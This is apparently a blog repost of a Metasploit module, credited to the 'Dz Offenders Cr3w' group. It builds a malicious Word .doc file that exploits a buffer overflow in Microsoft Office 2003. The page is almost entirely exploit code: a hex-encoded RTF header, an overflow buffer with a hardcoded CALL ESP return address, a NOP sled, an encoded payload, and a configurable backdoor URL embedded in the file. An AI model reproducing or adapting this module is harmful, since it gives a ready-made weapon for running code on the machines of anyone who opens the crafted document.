Ms.Office 2003 Buffer Overflow

## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h | # | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. | # | ------------------------------------------------- < | ### ## # $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Office 2003 (.doc) Command Exec and local BOF', 'Description' => %q{ This module exploits a buffer overflow in Microsoft Office 2003 and Command Exec With .doc file . }, 'License' => MSF_LICENSE, 'Author' => [ 'b33f', 'g11tch', 'KedAns-Dz ' # MSF module ], 'Version' => '1.0', 'References' => [ [ 'URL', 'http://exploit-db/exploits/18334' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "'", 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' => { 'BufferRegister' => 'ESI', } }, 'Platform' => 'win', 'Targets' => [ [ 'Microsoft Office 2003 - MSWord (.doc Heap Spray)', { 'Ret' => '' } ], ], 'DisclosureDate' => 'JAN 08 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']), OptString.new('URLBD', [ true, 'URL From the Backdoor.', 'http://']), ], self.class) end def exploit # Encode the url. url = Rex::Text.to_unescape(datastore['URLBD']) # Header File file = "\x7b\x5c\x72\x74\x23\x23\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70"+ "\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73"+ "\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a"+ "\x5c\x73\x68\x70\x69\x6e\x73\x74\x5c\x73\x68\x70\x66\x68\x64\x72"+ "\x30\x5c\x73\x68\x70\x62\x78\x63\x6f\x6c\x75\x6d\x6e\x5c\x73\x68"+ "\x70\x62\x79\x70\x61\x72\x61\x5c\x73\x68\x20\x70\x77\x72\x32\x7d"+ "\x7b\x5c\x73\x70\x7b\x5c\x73\x6e\x20\x7b\x7d\x7b\x7d\x7b\x5c\x73"+ "\x6e\x7d\x7b\x5c\x73\x6e\x7d\x7b\x5c\x2a\x5c\x2a\x7d\x70\x46\x72"+ "\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+ "\x7b\x5c\x73\x76\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+ "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x52"+ "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+ "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x39\x3b\x32\x3b\x66\x66"+ "\x66\x66\x66\x66\x66\x66\x66\x66" # Buffer Overflow buf = "\x23" * 501 buf << "\x30\x35" buf << "\x30" * 40 buf << "\x36\x36\x34\x33\x33\x32\x33\x30" # CALL ESP - WINWORD.exe buf << "\x30\x30\x30\x30\x38\x30\x37\x63" * 2 buf << rand_text_alpha(42) buf << "\x39\x30" * 18 buf << payload.encoded # Create the doc doc = file doc << buf doc << url doc << "\x00" doc << "{}}}}}}" doc << "\x0d\x0a" doc << "}" print_status("Creating '#{datastore['FILENAME']}' file...") file_create(doc) end end

Share on Google Plus

About Elmirakom

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.